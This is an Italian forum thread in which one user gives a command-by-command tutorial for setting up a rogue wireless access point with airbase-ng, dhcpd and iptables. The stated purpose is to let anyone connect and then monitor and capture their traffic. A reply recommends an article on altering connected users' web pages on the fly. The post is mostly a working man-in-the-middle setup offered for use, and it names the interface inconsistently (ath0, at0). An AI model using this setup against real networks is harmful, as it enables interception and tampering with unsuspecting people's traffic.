Come creare un AP falso con tua scheda wifi.

[ghostdog67]

Dimostrazione di come creare un AP falso e passare internet attraverso.

i passi sono:
* configurare il dhcpd.conf
*iniziare il AP falso con airbase-ng
*configurare IP tables per avere internet
*monitorare e catturare il traffico internet.

i tools necessarii:
> Backtrack4 mod.iso ( anche pre-final va' bene)
> scheda wifi esterna (usb)per creare una connessione internet su wlan1
e un getaway 192.168.1.1
> wireless card interna nel mio laptop che usero come AP falso. wlan0


Prima bisogna configurare il dhcpd.conf file.

Apri la console e scrivi:

nano /etc/dhcp3/dhcpd.conf ( ENTER )

*** copia il seguente nella console:

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 4.2.2.2;
range 192.168.2.130 192.168.2.140;
}

*** Premi Ctrl + X ---> Y --> ENTER per salvare il tutto.

*** Ora per iniziare il AP falso con airbase-ng devi mettere la tua carta in monitor ( ricordati ,questa e' la tua carta interna wlan0)

airmon-ng
airmon-ng start wlan0
airbase-ng -e "GHOSTDOG" -c 9 mon0

** Questo crera' una interface ( ath0 ) non criptata sul canale 9 che chiamero' GHOSTDOG ( tu chiamala quello che vuoi).

*** ora apri la console e scrivi:

airbase-ng -e "GHOSTDOG" -c 9 mon0

*** il sistema rispondera':
20:54:01 Create tap interface ath0
20:54:01 Trying to set MTU on ath0 to 1500
20:54:01 Trying to set MTU on mon0 to 1800
20:54:01 Access Point with BSSID 00:242:A1:40:8E started

*** adesso deve assegnare un subnet e un getaway;
apri la console e scrivi:

ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

*** Ora devi comiciare il DHCP, nella stessa console scrivi:

mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

*** adesso devi creare gli IP tables per filtrare il traffico su ath0 verso internet. ( la tua wireless card wlan1 deve essere connessa a internet)
*** apri la console e scrivi:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1

@@@@@@@@@ Complimenti, ora hai generate un AP falso che chiunque potrebbe connettersi a te e avere internet @@@@@@@@@@@@@@@@@@@@@

[crossbower]

Bel howto ghostdog67.

Voglio aggiungere solo un link con un po' di materiale interessante, riguardo a quello che si puo' fare una volta aver messo su quello che hai illustrato.

Upside-Down-Ternet

L'articolo spiega come usare squid (vecchia versione) per modificare on-the-fly le pagine web di chi si collega al nostro access-point.
Alcuni comandi vanno adattati se si utilizza squid nuova versione.

Consiglio anche solo una lettura veloce, perche' illustra cose simpatiche